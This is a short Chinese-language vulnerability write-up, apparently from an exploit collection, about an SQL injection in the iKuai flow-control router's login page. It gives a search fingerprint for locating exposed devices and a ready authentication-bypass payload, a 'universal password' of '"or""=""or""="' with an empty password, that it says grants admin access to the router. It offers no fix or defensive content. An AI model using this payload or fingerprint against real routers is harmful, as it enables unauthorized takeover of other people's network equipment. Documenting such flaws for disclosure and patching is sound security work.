iKuai 流控路由 SQL注入漏洞¶

漏洞描述¶

iKuai 流控路由 存在SQL注入漏洞，可以通过SQL注入漏洞构造万能密码获取路由器后台管理权限

漏洞影响¶

iKuai 流控路由

网络测绘¶

title="登录爱快流控路由"

漏洞复现¶

登录页面如下

使用万能密码登录后台

user: "or""=""or""="
pass: 空